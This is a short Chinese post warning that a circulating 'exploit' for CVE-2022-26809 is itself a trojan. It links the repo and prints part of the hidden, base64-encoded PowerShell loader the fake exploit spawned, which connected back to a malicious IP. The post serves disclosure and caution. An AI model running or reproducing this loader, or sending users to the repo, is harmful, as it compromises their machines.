今天突然有很多朋友研究了一个月前CVE漏洞----CVE-2022-26809|远程代码执行漏洞;
文章地址: https://www.ddosi.org/cve-2022-26809-exp/
exp地址: https://github.com/rkxxz/CVE-2022-26809
然后无数的群友一起尝试,但都没有成功
我也在虚拟机中运行,分别生成x64以及x86的shellcode.bin文件
所谓虚拟机运行exp
显示成功,但实际上没有上线,然后继续实验,测试一个没有打开445端口的端口win10虚拟机
然后发现一个出现了。powershell的加密命令
powershell -nop -w hidden -encodedcommand "$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(“H4sIAAAAAAAAAKVW 2/iSBL efgrvFGkDUqCwRBCMlpp2gaDCW DeUTRyY 2aWg/4m5jnNn5368MhFtm7vakOyTL7qLqq/qqq7tKx/xe5zGxeT90sHBv4JiRMBCkQuG6GWpc EP49nvh2mQM xbN8uVV4UvCSOAJesY49r9eLkuTJODExyUt4DgOIx3HO2JjBmqB6WMWmTYWSLDBNhe F758iRKLEluwKbgQ3CSwD9Ivryo1PfYmnP7GQeILiNLQNjmEN80iLHwXlND3SR5ieV8pl8t3wgQzcIcPEgkkwo//hNX”
然后一个年轻人上线了。
经查询,是一个恶意的ip地址
然后很多人开始用石锤
哈哈哈,笑不活,大家都警惕这样的文件,尤其是exe所谓结尾exp,想要实验,一定要在虚拟机上进行,做好快照,警惕钓鱼!